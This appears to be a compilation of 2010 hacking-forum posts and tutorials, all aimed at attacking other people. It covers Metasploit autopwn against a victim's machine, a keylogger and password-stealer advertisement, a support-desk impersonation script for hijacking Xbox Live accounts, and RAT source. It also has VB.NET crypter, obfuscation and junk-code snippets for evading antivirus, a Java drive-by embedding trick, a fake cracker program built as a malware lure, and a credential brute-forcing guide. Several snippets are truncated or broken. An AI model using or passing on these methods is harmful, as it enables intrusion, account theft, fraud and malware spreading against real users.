- And last: Use your brain. And if you want; Do a lot of thinking before releasing any video. Remember: The longer you think, the better it gets.
The Basics of Reversing With OllyDbg

In this video tut I go over some of the extreme basics of OllyDbg, and how to crack an uber simple crackme. Hope you guys like it.



(TuT) Hacking with Nmap and Metasploit.

Today I am writing a tutorial on hacking with Nmap with Metasploit.

First d/l Metasploit 3.3 from the official website,Link:

Let all that install, and towards the end of the installation it will ask if you would like Nmap installed also, choose yes. Once you have that installed the Metasploit screen will open up as shown below...

[Image: 1-2.jpg]

Now type db_create

Once you have typed that type nmap

This loads nmap, as shown below....

[Image: 11.gif]

You need to configure your scan now, I usually do a simple -sT -sV scan which will tell us the open ports and services running on the victims computer, Now type nmap -sT -sV (X's being victims Ip number), Demonstrated below.

[Image: 11-1.gif]

Now give it 5 minutes to complete the scan,Once that is complete if your lucky you should get a response like this...

[Image: 12.gif]

This is basically a list of the open ports and services running on the target machine, Now the handy feature of the metasploit 3.3 framework is the autopwn feature, this basically searches and runs all matching exploits in the Metasploit database against the target machine and if successful will create a shell or similar privilege for the attacker.

Now once you have the nmap results delivered back to you showing the open ports and services type db_autopwn -p -t -e , From this point you will either have access to the victims computer through a successfully launched exploit or you will get a response saying the machine wasn't vulnerable to any of the exploits in the Metasploit database. Unfortunately on this particular machine I found it wasn't vulnerable as the image below proves.Good luck.

[Image: ff.gif]
Emissary v3B ~ Believe in the Best

[Image:  29076353.jpg]

[Image: 65732962.jpg]

Password Logs:

[Image: dfu1c7.jpg]

Since v3.0 had some bugs which I got from users, I had to work on a new version.

Now don't go on the Gui looks. Just because version 3.0 and v3B look the same doesn't mean they are.

What's New in v3B?

-> Pidgin Stealer had some error. *Fixed*

-> Keylogs were fucked up if the victim typed fast. Fixed by changing the whole keylogging method.
Now its 5times more efficient than the previous keylogging method.

-> Previous logs were being attached to new ones. Fixed that one too.

-> If Email didn't work the ftp stopped working. A little change in try catch position here and there Fixed. Now you can use either one of them or both.

-> Added 2 Stub types. Admin and Non Admin Stub. Admin Stubs gives full power to the logger etc etc.

-> Stub size Reduced significantly from previous versions.

-> I feel lot of you were bugging me for direct links, and so sacrificing the money I used to get from the logger I'm uploading this thing on BUT BUT BUT only for 48 hours. x)

What is Admin Stub and Non Admin Stub?

==If you want the keylogger to have full control of the system use this stub==

1) Copy Admin Stub and keep it with Keylogger v3.exe
2) Build Server like you usually do.

****Flaw of Admin Stub****

1) Will force admin if the victim has admin rights, else it will quit.
So unless you are sure or don't care about it use the admin stub.

****Benefit of Admin Stub****

1) It will give full power to the keylogger and the keylogger can exploit the system
without any limitation.

2) Disable options will work properly on a system with Win7 OS and UAC on.

==Non Admin Stub for no Disable Options on Win7 with UAC==

1) Same usage as admin stub.

**Flaw Of Non Admin Stub**

1) Not able to exploit a system completely with UAC on.

2) Disable options will not work with UAC on.

3) Has trouble bypassing antivirus in some cases.

**Benefit of Non Admin Stub**

1) Doesn't need admin rights to execute.

2) Will still send logs even if user doesn't have Admin or even if UAC is on.

Download the file:

Password for the file:

(TuT) Calling In Xbox Live Accounts

But the method is free. This is using the form reset.

You will need some numbers. I have got some for you.
Windows Live One Care: 1800-936-5700
MSN Group: 1800-386-5550
MSN TV: 650-964-7200
Microsoft: 1800-936-4900
Microsoft: 1800-642-7676

You can use Skype to call most of these numbers.

First call 18004699269 (Xbox Support)
Get an agent on the line (Saying agent over and over again usually works)
If it works, you will be in the repair section of the call center.

Tell them you want to recover your gamertag because ; (Make up a reason, " I got the E74 Error ")

If you have your victims name this will work better. If you don't know the victims name, make one up on the spot, I use " Conway Twitty "

They SHOULD say they can't verify the information on the account. Just say you will have to talk to your father (or) brother who created the account. Ask for a reference number and to link the account information to the reference number.Write the ref number down, Make sure they link the account information to the reference number. This is vital, you might have to call a few times to get someone to do this.

Remember the more times you call in the higher chance you have to get the account flagged, and eventually locked.

Alright now we call Windows Live OneCare, Once you get the machine, press 1 (4 times). Wait for an agent...
Once you get an agent, they will ask for your name and your reference number (Give them the name you used to call Xbox (Conway Twitty) and the reference number you wrote down.

Say you have a few Windows LIVE logins written down infront of you and your father (or) brother mixed them up, Ask them if they can verify the name linked to the reference number (This can take a few calls)

If it works, thats the name of your victim. Open a notepad and take it down.

Recall them and do the same thing but this time ask for a phone number linked to the reference number.

Once you have collected some information, call Xbox back and say you called in before but forgot your reference number. You remember the
name your father (or) brother put on the account was(Name Here) and try to get the credit card verification part.
Now, say it's your Sisters (or) Mothers and that you'll recall when she is home. Ask for a reference number
with all the account information linked to the notes of the reference number. When get better at calling in,
this will be needed a lot less . You can get more information from the first call.

On your next call. Try to retrieve the email address.

Once you have all this information you will be able to get the home address.

Now with all the information in notepad visit

And submit the form ( This works 90% of the time ) if it doesn't work just try again :)

Friday, May 28, 2010

[Source] Albertino RAT Source + Bin

This is the source code to Albertino's RAT.

Download the source here:

The password for the file is here:


[VB.NET] Disable Showing Hidden Files

Sub Hide()
Dim regloc as String = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
My.Computer.Registry.SetValue(regloc, "Hidden", "0", Microsoft.Win32.RegistryValueKind.DWord)
End Sub

[VB.NET] Polymorphic RC4 Encryption

Basically this is an encryption class that will produce a random output every time, but is always decrypted to the same source.

It's written mostly by me, but I based the encrytpion off a snippet written by Wahankh

Imports System.Text

Public Class PolyRC4

' PolyMorphic RC4 Class
' Written by Deathader
' Original Polymorph code by:
' Wahankh (Had to modify a LOT because it didn't work, added RC4, etc.
' Please credit me if you use!
Private Key As String = "923- i231id3id12di12 mod1o2do12d*DU221-u(@10ie02i0=di=@)!IE)I@Do12\doqwo["
Sub New(ByVal EncryptionKey As String)
Key = EncryptionKey
End Sub
Public Function Encrypt(ByVal message As String) As String
message = x(message, Key)
Dim random As New Random()
Dim list1 As New ArrayList(), list2 As New ArrayList()
Dim out As String = ""
Dim num1 As Integer = random.[Next](1, 10255)
For i As Integer = 0 To message.Length - 1
Dim num2 As Integer = random.[Next](num1) '(&H7A) + &H44
list1.Add(Convert.ToInt32(message(i)) + num2)
For j As Integer = 0 To message.Length - 1
out += ChrW(list1(j)) & ChrW(list2(j))

Return out
End Function
Public Function Decrypt(ByVal message As String) As String

Dim numArray As Integer() = New Integer(message.Length - 1) {}
Dim temp As String = ""

For i As Integer = 0 To message.Length - 1
numArray(i) = Convert.ToInt32(message(i))

For j As Integer = 0 To message.Length - 1 Step 2
Dim num3 As Integer = numArray(j)
Dim num4 As Integer = numArray(j + 1)
Dim num5 As Integer = num3 - num4
temp = temp + ChrW(num5)
Return x(temp, Key)
End Function
Private Function x(ByVal nGeeKnK As String, ByVal eKieBrN As String) As String
Dim oHgeIrT As Integer = 0
Dim rErnEoE As Integer = 0
Dim rEeiRfF As New StringBuilder
Dim nJrnJgL As String = String.Empty
Dim bIjeGnR As Integer() = New Integer(256) {}
Dim nBjvRbE As Integer() = New Integer(256) {}
Dim gEgeGnE As Integer = eKieBrN.Length
Dim fBjeEgE As Integer = 0
While fBjeEgE <= 255
Dim fGrjEnG As Char = (eKieBrN.Substring((fBjeEgE Mod gEgeGnE), 1).ToCharArray()(0))
nBjvRbE(fBjeEgE) = Microsoft.VisualBasic.Strings.Asc(fGrjEnG)
bIjeGnR(fBjeEgE) = fBjeEgE
System.Math.Max(System.Threading.Interlocked.Increment(fBjeEgE), fBjeEgE - 1)
End While
Dim vHbrDnG As Integer = 0
Dim jPkkXjV As Integer = 0
While jPkkXjV <= 255
vHbrDnG = (vHbrDnG + bIjeGnR(jPkkXjV) + nBjvRbE(jPkkXjV)) Mod 256
Dim nCokVrH As Integer = bIjeGnR(jPkkXjV)
bIjeGnR(jPkkXjV) = bIjeGnR(vHbrDnG)
bIjeGnR(vHbrDnG) = nCokVrH
System.Math.Max(System.Threading.Interlocked.Increment(jPkkXjV), jPkkXjV - 1)
End While
fBjeEgE = 1
While fBjeEgE <= nGeeKnK.Length
Dim rErrTnE As Integer = 0
oHgeIrT = (oHgeIrT + 1) Mod 256
rErnEoE = (rErnEoE + bIjeGnR(oHgeIrT)) Mod 256
rErrTnE = bIjeGnR(oHgeIrT)
bIjeGnR(oHgeIrT) = bIjeGnR(rErnEoE)
bIjeGnR(rErnEoE) = rErrTnE
Dim rHgeHgH As Integer = bIjeGnR((bIjeGnR(oHgeIrT) + bIjeGnR(rErnEoE)) Mod 256)
Dim fGrjEnG As Char = nGeeKnK.Substring(fBjeEgE - 1, 1).ToCharArray()(0)
rErrTnE = Asc(fGrjEnG)
Dim vRbTKeR As Integer = rErrTnE Xor rHgeHgH
System.Math.Max(System.Threading.Interlocked.Increment(fBjeEgE), fBjeEgE - 1)
End While
nJrnJgL = rEeiRfF.ToString
rEeiRfF.Length = 0
Return nJrnJgL
End Function
End Class

[VB.NET] Scantime Crypter Example (With RC4)

Basically, it loads an exe file in, encrypts it, and writes it to the stub.

The stub then parses out the exe, decrypts it, saves it and runs it :)

This is useful for building a packer or a rat builder etc..

NOTE! The drop method this uses is VERY noisy (AV's will pick up the saving and running). Also the melt method I included isn't good either.

Enjoy :)


[VB.NET] RC4 Encryption

Public Function rc4(ByVal message As String, ByVal password As String) As String

Dim i As Integer = 0
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty

Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}

Dim intLength As Integer = password.Length

Dim a As Integer = 0
While a <= 255

Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))

key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While

Dim x As Integer = 0

Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
End While

a = 1

While a <= message.Length

Dim itmp As Integer = 0

i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp

Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)

Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)

itmp = Asc(ctmp)

Dim cipherby As Integer = itmp Xor k

System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While

returnCipher = cipher.ToString
cipher.Length = 0

Return returnCipher

End Function

[VB.NET] Junk Code Generator

I know it's written sloppy. It was intended for personal use.


public Class Password

Private Const PASS_LOWERS As String = "abcdefghijklmnopqrstuvwxyz"
Private Const PASS_NUMBERS As String = "0123456789"
Private Const PASS_SPECIALS As String = "~`!@#$%^&*()_+=-{[}]|;:'<,>.?"

Public Function GeneratePassword(ByVal Uppers As Boolean, ByVal Lowers As Boolean, ByVal Numbers As Boolean, ByVal Specials As Boolean, ByVal passwordLength As Integer) As String

Dim strCharacters As String
Dim strNewPassword As String
Dim p As Integer

If Uppers = True Then
strCharacters = strCharacters & PASS_UPPERS
End If
If Lowers = True Then
strCharacters = strCharacters & PASS_LOWERS
End If
If Numbers = True Then
strCharacters = strCharacters & PASS_NUMBERS
End If
If Specials = True Then
strCharacters = strCharacters & PASS_SPECIALS
End If


For p = 0 To (passwordLength - 1)
strNewPassword = strNewPassword + Mid(strCharacters, Len(strCharacters) * Rnd() + 1, 1)

GeneratePassword = strNewPassword

End Function

End Class

Function GenerateJunk(ByVal ammount As Integer) As String

If ammount = 0 Then
ammount = 1
End If

Dim out As String = "Module " & s(20)
Dim y As Integer = 0

Do Until y = ammount

Dim a As Integer = n(3, 1)

Dim e As String = s(60)
If a = 1 Then
out += vbNewLine & vbNewLine & "Public Function " & s(124) & "(" & s(16) & " as string)as string" & vbNewLine

out += "on error goto " & e & vbNewLine
out += vbNewLine & "Public Sub " & s(n(50, 8)) & "(" & s(49) & " as string)" & vbNewLine
End If

Dim i As Integer = 0

Dim limit As Integer = n(30, 10)

Do Until i = limit
Dim type As Integer = n(5, 0)

If type = 1 Then
out += "Dim " & s(26) & " as string = " & Chr(34) & s(n(35, 76)) & Chr(34) & vbNewLine
i += 1
ElseIf type = 2 Then
out += "msgbox(" & Chr(34) & s(n(100, 276)) & Chr(34) & ")" & vbNewLine
i += 1
ElseIf type = 3 Then
out += "Dim " & s(56) & " as integer = " & n(999999, 100000) & vbNewLine
i += 1
out += "dim " & s(n(10, 60)) & " as integer = " & n(100000, 9999999) & " + " & n(214124, 1243145) & " + " & n(214124, 1243145) & " + " & n(214124, 1243145) & vbNewLine
End If

If a = 1 Then
out += e & ":" & vbNewLine

Dim h As Integer = 0
Dim hl As Integer = n(10, 3)
Do Until h = hl

Dim type As Integer = n(4, 0)

If type = 1 Then
out += "Dim " & s(26) & " as string = " & Chr(34) & s(n(35, 76)) & Chr(34) & vbNewLine
i += 1
ElseIf type > 1 Then
out += "msgbox(" & Chr(34) & s(n(100, 276)) & Chr(34) & ")" & vbNewLine
i += 1
out += "If " & n(100000, 9999999) & " > " & n(214124, 1243145) & " then" & vbNewLine

out += "Dim " & s(26) & " as string = " & Chr(34) & s(n(35, 76)) & Chr(34) & vbNewLine
out += "Dim " & s(26) & " as string = " & Chr(34) & s(n(35, 76)) & Chr(34) & vbNewLine
out += "Dim " & s(26) & " as string = " & Chr(34) & s(n(35, 76)) & Chr(34) & vbNewLine
out += "End if" & vbNewLine

out += "Dim " & s(56) & " as integer = " & n(999999, 100000) & vbNewLine
i += 1
End If
h += 1

out += "End Function" & vbNewLine & vbNewLine

out += "End Sub" & vbNewLine & vbNewLine
End If
y += 1
out += "End Module"

Return out
End Function

Function s(ByVal len As String) As String
Dim x As New Password
Return x.GeneratePassword(True, True, False, False, len)
End Function

Public Function n(ByVal MaxNumber As Integer, _
Optional ByVal MinNumber As Integer = 0) As Integer
'initialize random number generator
Dim r As New Random(System.DateTime.Now.Millisecond)

'if passed incorrect arguments, swap them
'can also throw exception or return 0

If MinNumber > MaxNumber Then
Dim t As Integer = MinNumber
MinNumber = MaxNumber
MaxNumber = t
End If

Return r.Next(MinNumber, MaxNumber)

End Function


Sub Gen(ByVal a As String)
TextBox1.Text = GenerateJunk(a)
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim x As New Threading.Thread(AddressOf Gen)
x.Start(TrackBar1.Value) ' TrackBar1.Value = How much code to generate. 1 is mininum, 20+ is a LOT!
End Sub


[TUT] How to make your Java Driveby window show up on forums

This may be old news, but I've found a neat little way to make your Java Driveby "Run" window show up on any forums that allows embedding. (Many forums have this enabled for users to embed YT videos etc.) Second, you need to make your Java Driveby site have a good looking name that is related to the site you're posting on. If you're only planning on doing it to one site, you might want to make a domain that is similar to that website. All you have to do is copy/paste this below your forum post:
Replace with your java driveby link. Remember, this only works on forums/sites that allow embedding. Before you ask, no, it does not work on HF. Here is a good example:
[Image: examplezd.png]
Good luck.

(TuT) How to Make A Fake Program

Hey there, I'll be showing you how to make a fake program today.

Q. What is a fake program?

A. A fake program is a program that looks quite realistic[/size] and appealing to the user, it is normally binded with malware or viruses to trick the user into opening the program.

Today, I'll be showing you how to make one in VB 2008.

Download link : Visual Basic 2008


Open VB 2008 up. Click Windows Application, name it whatever you want, but for this tutorial, I'll name it "Fake Program 1."

You'll see a square with nothing on it, that's called the form.

On your right, (or left) you'll see a big box, that's called the toolbox.

The toolbox has quite a lot of options in it, such as buttons, textboxes, etc;

There are hundreds of fake programs out there; but today, I'll be making a Myspace Account Cracker.

This will trick the person into downloading and saying "Oh wow! Im gonna hack my friends Myspace! Oh yeah!"

So, now let's start out.

From the toolbox, drag onto the form, 2 textboxes, 2 buttons, 2 labels.

A textbox is a box where you can put text inside, a button, makes a function occur when clicked on, and a label, is just for decoration, :)

Now, the textbox is going to be where the person put's the Myspace user's email. Now, to make our lives easier, put the label beside the textbox, and right click it, and choose properties.

In the properties, you will see a option called "text," in that text, put "Victim's e-mail." The trick to getting a fake program right, is to make it look really good, for example, this won't look good at all compared to "Victim's e-mail," "victimz email."

Compare those two, the first one looks ALOT better.

Now, the second textbox is going to be where the "fake password," pops out.

Now, right click on the first button, and click on properties, and in the text, put "OK," this will "start," our program, and the password will pop out in the textbox.

The second button isn't important at all, it's just a exit button.

In the properties of it, in the text put "Exit."

Now, right click on the form, and in the properties, where it says text, put "Myspace Account Cracker," on show icon, put false. Form border style, fixed single, and show in taskbar, false.

If you want to, you can also put a backround image to make it look a bit more cleaner and nicer, so it will be a bit more convincing.

And, in the properties of our second label, in the text put "password," and put the label right beside the second textbox.


The program isn't actually supposed to crack a Myspace account, it's only supposed to be binded with using a binder. If you are binding a virus with it, you are also going to be using a crypter.

- Binder : Program which binds two files together into one.

- Crypter : Program which makes a program, normally malware, to be undetected by AV's, (Anti - Viruses).

Now, on the first button, double click it, and, put the following code :

If TextBox1.Text = "" Then
MsgBox("Please enter a valid e-mail.")
TextBox1.Enabled = True
Dim Key As Integer
Key = (Rnd() * 5)
Select Case Key
Case 1
TextBox2.Text = "FAKE PASSWORD"
Case 2
TextBox2.Text = "FAKE PASSWORD"
Case 3
TextBox2.Text = "FAKE PASSWORD"
Case 4
TextBox2.Text = "FAKE PASSWORD"
Case 5
TextBox2.Text = "FAKE PASSWORD"
Case 6
TextBox2.Text = "FAKE PASSWORD"
Case 7
TextBox2.Text = "FAKE PASSWORD"
Case 8
TextBox2.Text = "FAKE PASSWORD"
Case 9
TextBox2.Text = "FAKE PASSWORD"
Case 10
TextBox2.Text = "FAKE PASSWORD"

End If

NOTE : Add how many cases you need, the number of cases = the number of passwords.

On the exit button, put in



Thursday, May 27, 2010

Crack porn sites with the click of a button! (TuT)

Tired of paying for porn? I've got a solution.

Anyway. This is a tutorial to crack pop up porn password sites, such as BangBros.

I'll explain how this is done before we get to cracking. There's a program called Sentry that you insert things called combolists which have users/pws used to crack. You then insert the site you want to use, put proxies, and it bruteforces until it finds user/pw combo that works. Some of them don't work, so you use a checker to see the ones that do work.

So first, let's download Sentry. Download it here -


I inserted a combolist in the folder so you don't have to download some. has tons of combolists, if you want to get more. My suggestion is to open a bunch of those combolists and just put them all in one (Sentry doesn't let you individually run them, has to only be one).

Let's open Sentry.

[Image: 30k61pg.png]

Insert the site you want to crack, in the example I used

The bots should be 10, unless you have a fast computer, then you can do whatever you wish (don't do 100, max 25)

Disable Screenshots. That's just a waste, no need for it. Disable it on the right side and uncheck the box.

Click on Wordlist on the navigation tool bar.

[Image: 35clvls.png]

As shown in the screenshot, load any. I do suggest to combine the combolists (just copy and paste it in to one, might take 5 minutes) so you have more to work with.

After you load the wordlist, click on the Proxies tab.

[Image: 256zmv9.png]

Go to this section and get proxies, or you can go to (favorite place to get them).

Once you find proxies, copy and paste them into a Notepad and save it as proxies.txt and save it to the desktop. Right click the slot where the proxies would go and click Load selected proxies. Then, find your proxies.txt and click it. It should load proxies.

You should now be able to start. Click the Start button and watch it progress in Progression. You can now see when you get a hit on the bottom where it says Hits. Sentry also checks for fakes, but it's not thorough at all.

[Image: 35mppxs.png]

If you run this overnight, you can get 200+ passwords and boom! You can sell them, release them to the public (only PM people if you do it on HF), or just watch your porn with tons of accounts!

The last thing is the XXX Checker. Once you've got quite a bit of hits, go to History. Click your first hit, and go to the bottom hit and hold Shift and click it. You should now have all of them selected. Right click and click Copy URLs to Clipboard. Now, go to Notepad and copy and paste them in so you have them. If you don't want to, you can just copy and paste it right into the Checker.

Download the XXX Checker here -


When you download it, open it up. You should be able to copy and paste the hits into the checker.

[Image: 24qtjzm.png]

Click Start Check and you'll now have it checking. Then, you can click Passwords: Ok and see the ones that worked and copy and paste them into a Notepad and boom, you've got working passwords.

I hope this helped you learn something. This took me 1-2 hours to do, so please thank me and post on the thread so it doesn't fall.

Sites that this works on are all popup porn sites. I used to have a list, but I lost it. If Golden-Joint wasn't acting up, I would get the list from there. We'll start a list.

Sites -

This is just some of the sites you can crack, not even close to all of them.

Hope you enjoyed this tutorial. If you have questions, post them and I'll answer.

Credits to Yin